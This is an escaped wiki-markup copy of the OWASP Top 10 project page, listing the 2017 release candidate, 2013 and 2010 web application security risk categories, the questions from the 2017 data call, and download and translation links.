&lt;br /&gt;
* [[OWASP_Mobile_Security_Project#Top_Ten_Mobile_Risks | OWASP Mobile Top 10 Risks]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_Ten_Cheat_Sheet | OWASP Top 10 Cheat Sheet]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Proactive_Controls | Top 10 Proactive Controls]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_10/Mapping_to_WHID | OWASP Top 10 Mapped to the Web Hacking Incident Database]]&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Top-10&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
* [[Media:OWASP_Top_10_-_2013.pdf | OWASP Top 10 2013 - PDF]]&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - wiki]]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Covering Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
== Get Involved ==&lt;br /&gt;
* [https://lists.owasp.org/mailman/listinfo/Owasp-topten Project Email List]&lt;br /&gt;
* [https://github.com/OWASP/Top10/issues Top 10 Issues on GitHub]&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [11 Jul 2017] OWASP Top 10 2017 – The appeal for data and opinions is still open&lt;br /&gt;
* [10 Apr 2017] OWAP Top 10 - 2017 Release Candidate Published&lt;br /&gt;
* [17 Dec 2016] OWASP Top 10 - 2017 Data Call Data Published&lt;br /&gt;
* [20 May 2016] OWASP Top 10 - 2017 Data Call Announced&lt;br /&gt;
* [12 Jun 2013] OWASP Top 10 - 2013 Final Released&lt;br /&gt;
* [Feb 2013] OWASP Top 10 - 2013 - Release Candidate Published&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-flagship-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_DOC.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2017 Release Candidate 1 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The 2017 OWASP Top 10 RC1 has been rejected. A [https://goo.gl/forms/ltbKrdYrp4Qdl7Df2 new survey for security professionals] and a [https://goo.gl/forms/tLgyvK9O74r7wMkt2 reopened data call] are now open. More details can be found on [https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html this blog post]. &lt;br /&gt;
&lt;br /&gt;
The following text is now outdated and has been left strictly for historical purposes.&lt;br /&gt;
&lt;br /&gt;
==Historical/Outdated Information==&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here.]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
This release of the OWASP Top 10 marks this project’s fourteenth year of raising awareness of the importance of application security risks. This release follows the 2013 update, whose main change was the addition of 2013-A9 Use of Known Vulnerable Components. We are pleased to see that since the 2013 Top 10 release, a whole ecosystem of both free and commercial tools have emerged to help combat this problem as the use of open source components has continued to rapidly expand across practically every programming language. The data also suggests the use of known vulnerable components is still prevalent, but not as widespread as before. We believe the awareness of this issue the Top 10 - 2013 generated has contributed to both of these changes.&lt;br /&gt;
&lt;br /&gt;
We also noticed that since CSRF was introduced to the Top 10 in 2007, it has dropped from a widespread vulnerability to an uncommon one. Many frameworks include automatic CSRF defenses which has significantly contributed to its decline in prevalence, along with much higher awareness with developers that they must protect against such attacks.&lt;br /&gt;
&lt;br /&gt;
For 2017, the OWASP Top 10 Most Critical Web Application Security Risks (in the Release Candidate) are:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management&lt;br /&gt;
* A3 Cross-Site Scripting (XSS)&lt;br /&gt;
* A4 Broken Access Control (As it was in 2004)&lt;br /&gt;
* A5 Security Misconfiguration&lt;br /&gt;
* A6 Sensitive Data Exposure&lt;br /&gt;
* A7 Insufficient Attack Protection (NEW)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities&lt;br /&gt;
* A10 Underprotected APIs (NEW)&lt;br /&gt;
&lt;br /&gt;
== 2017 Update Data Call Data ==&lt;br /&gt;
&lt;br /&gt;
DATA CALL RESULTS ARE NOW PUBLIC: The [https://github.com/OWASP/Top10/blob/master/2017/datacall/OWASP%20Top%2010%20-%202017%20Data%20Call-Public%20Release.xlsx?raw=true results of this data call have been made public here] as an Excel spreadsheet with 4 tabs. Three of the tabs have raw data as submitted, organized into three vulnerability data size categories: large, small, and none. A 4th tab includes some basic analysis of the large size submissions. The OWASP Top 10 project thanks all the submitters for their input to the OWASP Top 10 - 2017.&lt;br /&gt;
&lt;br /&gt;
On May 20, 2016, the Top 10 project made a public announcement of the data call for the 2017 update to the OWASP Top 10. Contributors filled out the Google form posted here:  [https://docs.google.com/forms/d/1sBMHN5nBicjr5xSo04xkdP5JlCnXFcKFCgEHjwPGuLw/viewform?c=0&amp;amp;w=1&amp;amp;usp=mail_form_link OWASP Top 10 - 2017 Data Call], which had the questions listed below.&lt;br /&gt;
&lt;br /&gt;
Page 1 of 5: Submitter Info&lt;br /&gt;
&lt;br /&gt;
* Name of Company/Organization *&lt;br /&gt;
* Company/Organization Web Site *&lt;br /&gt;
* Point of Contact Name *&lt;br /&gt;
* Point of Contact E-Mail *&lt;br /&gt;
&lt;br /&gt;
Page 2 of 5: Background on Applications&lt;br /&gt;
&lt;br /&gt;
* During what year(s) was this data collected? *&lt;br /&gt;
** 2014&lt;br /&gt;
** 2015&lt;br /&gt;
** Both 2014 &amp;amp; 2015&lt;br /&gt;
*** If the application vulnerability data you are submitting was extracted from a publicly available report, please provide a link to that report (or reports), and the relevant page number(s)&lt;br /&gt;
&lt;br /&gt;
* How many web applications do the submitted results cover? * We consider web apps, web services, and the server side of mobile apps to all be web apps.&lt;br /&gt;
&lt;br /&gt;
* What were the primary programming languages the applications you reviewed written in? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Java&lt;br /&gt;
** .NET&lt;br /&gt;
** Python&lt;br /&gt;
** PHP&lt;br /&gt;
** Ruby&lt;br /&gt;
** Grails&lt;br /&gt;
** Play&lt;br /&gt;
** Node.js&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Please supply the exact percentage of applications per language checked off above:&lt;br /&gt;
&lt;br /&gt;
* What were the primary industries these applications supported? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Financial&lt;br /&gt;
** Healthcare&lt;br /&gt;
** eCommerce&lt;br /&gt;
** Internet/Social Media&lt;br /&gt;
** Airline&lt;br /&gt;
** Energy&lt;br /&gt;
** Entertainment (Games/Music/Movies)&lt;br /&gt;
** Government&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Where in the world were the application owners primarily? Again - select those where 5% or more of your results came from&lt;br /&gt;
** North America&lt;br /&gt;
** Europe&lt;br /&gt;
** AsiaPac&lt;br /&gt;
** South America&lt;br /&gt;
** Middle East&lt;br /&gt;
** Africa&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 3 of 5: Assessment Team and Detection Approach&lt;br /&gt;
&lt;br /&gt;
* What type of team did the bulk of this work? *&lt;br /&gt;
** Internal Assessment Team(s)&lt;br /&gt;
** Consulting Organization&lt;br /&gt;
** Product Vendor/Service Provider (e.g., SaaS)&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
*What type of analysis tools do they use? * Check all that apply.&lt;br /&gt;
** Free/Open Source Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Free/Open Source Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Free/Open Source Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Commercial Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Commercial Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial DAST/IAST Hybrid Analysis Tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Which analysis tools do you frequently use? This includes both free, commercial, and custom (in house) tools - List tools by name&lt;br /&gt;
&lt;br /&gt;
* What is your primary assessment methodology? * Primary being the majority of your assessments follow this approach&lt;br /&gt;
** Raw (untriaged) output of automated analysis tool results using default rules&lt;br /&gt;
** Automated analysis tool results - with manual false positive analysis/elimination&lt;br /&gt;
** Output from manually tailored automated analysis tool(s)&lt;br /&gt;
** Output from manually tailored automated analysis tool(s) - with manual false positive analysis/elimination&lt;br /&gt;
** Manual expert penetration testing (Expected to be tool assisted w/ free DAST tool(s))&lt;br /&gt;
** Manual expert penetration testing with commercial DAST tool(s)&lt;br /&gt;
** Manual expert code review (Using IDE and other free code review aids)&lt;br /&gt;
** Manual expert code review with commercial SAST tool(s)&lt;br /&gt;
** Combined manual expert code review and penetration testing with only free tools&lt;br /&gt;
** Combined manual expert code review and penetration testing with only commercial tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 4 of 5: Application Vulnerability Data&lt;br /&gt;
&lt;br /&gt;
Each question asks the number of vulnerabilities found for a particular type of vulnerability. At the end, is one catch all text question where you can add other types of vulnerabilities and their counts. If you prefer, just send your vulnerability data in a spreadsheet to brian.glas@owasp.org with these columns: CATEGORY NAME, CWE #, COUNT after you submit the rest of your input via this data call. ideally it would come from the email address you specified in the Point of Contact E-Mail question on Page 1 so its easy to correlate the two.&lt;br /&gt;
&lt;br /&gt;
* Number of SQL Injection Vulnerabilities Found (CWE-89)?&lt;br /&gt;
* Number of Hibernate Injection Vulnerabilities Found (CW-564)?&lt;br /&gt;
* Number of Command Injection Vulnerabilities Found (CWE-77)?&lt;br /&gt;
* Number of Authentication Vulnerabilities Found (CWE-287)?&lt;br /&gt;
* Number of Session Fixation Vulnerabilities Found (CWE-384)?&lt;br /&gt;
* Number of Cross-Site Scripting (XSS) Vulnerabilities Found (CWE-79)?&lt;br /&gt;
* Number of DOM-Based XSS Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Insecure Direct Object Reference Vulnerabilities Found (CWE-639)?&lt;br /&gt;
* Number of Path Traversal Vulnerabilities Found (CWE-22)?&lt;br /&gt;
* Number of Missing Authorization Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Security Misconfiguration Vulnerabilities Found (CWE-2)?&lt;br /&gt;
* Number of Cleartext Transmission of Sensitive Information Vulnerabilities Found (CWE-319)?&lt;br /&gt;
* Number of Cleartext Storage of Sensitive Information Vulnerabilities Found (CWE-312)?&lt;br /&gt;
* Number of Weak Encryption Vulnerabilities Found (CWE-326)?&lt;br /&gt;
* Number of Cryptographic Vulnerabilities Found (CWEs-310/326/327/etc)?&lt;br /&gt;
** You can report them all lumped together in 310 or in their individual categories. However you want.&lt;br /&gt;
* Number of Improper (Function Level) Access Control Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Cross-Site Request Forgery (CSRF) Vulnerabilities Found (CWE-352)?&lt;br /&gt;
* Number of Use of Known Libraries Found (No CWE)?&lt;br /&gt;
* Number of Unchecked Redirect Vulnerabilities Found (CWE-601)?&lt;br /&gt;
* Number of Unvalidated Forward Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Clickjacking Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of XML eXternal Entity Injection (XXE) Vulnerabilities Found (CWE-611)?&lt;br /&gt;
* Number of Server-Side Request Forgery (SSRF) Vulnerabilities Found (CWE-918)?&lt;br /&gt;
* Number of Denial of Service (DOS) Vulnerabilities Found (CWE-400)?&lt;br /&gt;
* Number of Expression Language Injection Vulnerabilities Found (CWE-917)?&lt;br /&gt;
* Number of Error Handling Vulnerabilities Found (CWE-388)?&lt;br /&gt;
* Number of Information Leakage/Disclosure Vulnerabilities Found (CWE-200)?&lt;br /&gt;
* Number of Insufficient Anti-automation Vulnerabilities Found (CWE-799)?&lt;br /&gt;
* Number of Insufficient Security Logging Vulnerabilities Found (CWE-778)?&lt;br /&gt;
* Number of Insufficient Intrusion Detection and Response Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Mass Assignment Vulnerabilities Found (CWE-915)?&lt;br /&gt;
* What other vulnerabilities did you find?&lt;br /&gt;
** Please provide in this format: CATEGORY NAME, CWE #, COUNT (one line per category). Say &amp;quot;No CWE&amp;quot; if there isn't a CWE # for that category. If you plan to send all your vulnerability data in via an email, please state so here so we know to expect it.&lt;br /&gt;
&lt;br /&gt;
Page 5 of 5: Suggestions for the next OWASP Top 10&lt;br /&gt;
&lt;br /&gt;
What do you think we should change?&lt;br /&gt;
&lt;br /&gt;
* Vulnerability types you think should be added to the T10? Because they are an unappreciated risk, widespread, becoming more prevalent, a new type of vulnerability, etc.&lt;br /&gt;
* Vulnerability types you think should be removed from the T10?&lt;br /&gt;
* Suggested changes to the Top 10 Document/Wiki?&lt;br /&gt;
* Suggestions on how to improve this call for data?&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2013 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On June 12, 2013 the OWASP Top 10 for 2013 was officially released. This version was updated based on numerous comments received during the comment period after the release candidate was released in Feb. 2013.&lt;br /&gt;
&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013.pdf OWASP Top 10 2013 document (PDF)].&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - Wiki.]]&lt;br /&gt;
* [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French (PDF)].&lt;br /&gt;
* [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German (PDF)]] &lt;br /&gt;
* [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korea (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian (PDF)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Presenting Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
For 2013, the OWASP Top 10 Most Critical Web Application Security Risks are:&lt;br /&gt;
&lt;br /&gt;
* [[Top_10_2013-A1-Injection | A1 Injection]]&lt;br /&gt;
* [[Top_10_2013-A2-Broken_Authentication_and_Session_Management | A2 Broken Authentication and Session Management]]&lt;br /&gt;
* [[Top_10_2013-A3-Cross-Site_Scripting_(XSS) | A3 Cross-Site Scripting (XSS)]]&lt;br /&gt;
* [[Top_10_2013-A4-Insecure_Direct_Object_References | A4 Insecure Direct Object References]]&lt;br /&gt;
* [[Top_10_2013-A5-Security_Misconfiguration | A5 Security Misconfiguration]]&lt;br /&gt;
* [[Top_10_2013-A6-Sensitive_Data_Exposure | A6 Sensitive Data Exposure]]&lt;br /&gt;
* [[Top_10_2013-A7-Missing_Function_Level_Access_Control | A7 Missing Function Level Access Control]]&lt;br /&gt;
* [[Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF) | A8 Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
* [[Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities | A9 Using Components with Known Vulnerabilities]]&lt;br /&gt;
* [[Top_10_2013-A10-Unvalidated_Redirects_and_Forwards | A10 Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
If you are interested, the methodology for how the Top 10 is produced is now documented here: [[Top_10_2013/ProjectMethodology | OWASP Top 10 Development Methodology]]&lt;br /&gt;
&lt;br /&gt;
Please help us make sure every developer in the ENTIRE WORLD knows about the OWASP Top 10 by helping to spread the word!!! &lt;br /&gt;
&lt;br /&gt;
As you help us spread the word, please emphasize: &lt;br /&gt;
&lt;br /&gt;
*OWASP is reaching out to developers, not just the application security community &lt;br /&gt;
*The Top 10 is about managing risk, not just avoiding vulnerabilities &lt;br /&gt;
*To manage these risks, organizations need an application risk management program, not just awareness training, app testing, and remediation&lt;br /&gt;
&lt;br /&gt;
We need to encourage organizations to get off the penetrate and patch mentality. As Jeff Williams said in his 2009 OWASP AppSec DC Keynote: “we’ll never hack our way secure – it’s going to take a culture change” for organizations to properly address application security.&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 and 2010 version were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages. The 2013 version was translated into even more languages.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
== Changes between 2010 and 2013 Editions ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2013 includes the following changes as compared to the 2010 edition:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management (was formerly 2010-A3)&lt;br /&gt;
* A3 Cross-Site Scripting (XSS) (was formerly 2010-A2)&lt;br /&gt;
* A4 Insecure Direct Object References&lt;br /&gt;
* A5 Security Misconfiguration (was formerly 2010-A6)&lt;br /&gt;
* A6 Sensitive Data Exposure (2010-A7 Insecure Cryptographic Storage and 2010-A9 Insufficient Transport Layer Protection were merged to form 2013-A6)&lt;br /&gt;
* A7 Missing Function Level Access Control (renamed/broadened from 2010-A8 Failure to Restrict URL Access)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF) (was formerly 2010-A5)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities (new but was part of 2010-A6 – Security Misconfiguration)&lt;br /&gt;
* A10 Unvalidated Redirects and Forwards&lt;br /&gt;
&lt;br /&gt;
== Other 2013 Top 10 Docs ==&lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP Top 10 - 2013 - Release Candidate]&lt;br /&gt;
*[https://www.owasp.org/images/3/3d/OWASP_Top_10_-_2013_Final_Release_-_Change_Log.docx OWASP Top 10 - 2013 - Final Release - Change Log (docx)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Changes-from-2010.pptx Focusing on What Changed Since 2010 (PPTX)]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP_Web_Top_10_for_2013.png]]&lt;br /&gt;
&lt;br /&gt;
== Feedback ==&lt;br /&gt;
&lt;br /&gt;
Please let us know how your organization is using the OWASP Top 10. Include your name, organization's name, and brief description of how you use the list. Thanks for supporting OWASP! &lt;br /&gt;
&lt;br /&gt;
We hope you find the information in the OWASP Top 10 useful. Please contribute back to the project by sending your comments, questions, and suggestions to topten@lists.owasp.org. Thanks! &lt;br /&gt;
&lt;br /&gt;
To join the OWASP Top 10 mailing list or view the archives, please visit the [http://lists.owasp.org/mailman/listinfo/owasp-topten subscription page.] &lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ==== Project Identification ====&lt;br /&gt;
{{Template:OWASP OWASP_Top10 Project}} --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2010 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On April 19, 2010 the final version of the OWASP Top 10 for 2010 was released, and here is the associated [[OWASPTop10-2010-PressRelease|press release]]. This version was updated based on numerous comments received during the comment period after the release candidate was released in Nov. 2009. &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 - 2010 Document] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 - 2010 - wiki]] &lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2010%20Presentation.pptx OWASP Top 10 - 2010 Presentation]&lt;br /&gt;
*[http://blip.tv/owasp-appsec-conference-in-europe/day2_track1_1430-1505-3936900 OWASP Top 10 Video of the Presentation above - this focused alot on the Top 10 for 2010 approach, rather than the details. (From OWASP AppSec EU 2010)]&lt;br /&gt;
*[http://www.vimeo.com/9006276 OWASP Top 10 Video of this Presentation when the Top 10 for 2010 was 1st released for comment - this goes through each item in the Top 10. (From OWASP AppSec DC 2009)]&lt;br /&gt;
&lt;br /&gt;
For 2010, the OWASP Top 10 Most Critical Web Application Security Risks are: &lt;br /&gt;
&lt;br /&gt;
*[[Top_10_2010-A1|A1: Injection]]&lt;br /&gt;
*[[Top_10_2010-A2|A2: Cross-Site Scripting (XSS)]]&lt;br /&gt;
*[[Top_10_2010-A3|A3: Broken Authentication and Session Management]]&lt;br /&gt;
*[[Top_10_2010-A4|A4: Insecure Direct Object References]]&lt;br /&gt;
*[[Top_10_2010-A5|A5: Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
*[[Top_10_2010-A6|A6: Security Misconfiguration]]&lt;br /&gt;
*[[Top_10_2010-A7|A7: Insecure Cryptographic Storage]]&lt;br /&gt;
*[[Top_10_2010-A8|A8: Failure to Restrict URL Access]]&lt;br /&gt;
*[[Top_10_2010-A9|A9: Insufficient Transport Layer Protection]]&lt;br /&gt;
*[[Top_10_2010-A10|A10: Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages and the 2010 version was translated into even more languages. See below for all the translated versions.&lt;br /&gt;
&lt;br /&gt;
== 2010 Versions ==&lt;br /&gt;
&lt;br /&gt;
2010 Edition: &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 2010 - PDF] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 2010 - wiki]]&lt;br /&gt;
&lt;br /&gt;
2010 Translations: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF / 这里下载PDF格式文档]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] &lt;br /&gt;
*[[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]]&lt;br /&gt;
*[https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF]&lt;br /&gt;
*[https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF]&lt;br /&gt;
*[https://www.owasp.org/images/8/86/OWASP_Top_10_-_2010_FINAL_%28spanish%29.pptx OWASP Top 10 2010 - Spanish PPT]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF]&lt;br /&gt;
&lt;br /&gt;
2010 Release Candidate: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/index.php/File:OWASP_T10_-_2010_rc1.pdf OWASP Top 10 2010 Release Candidate] &lt;br /&gt;
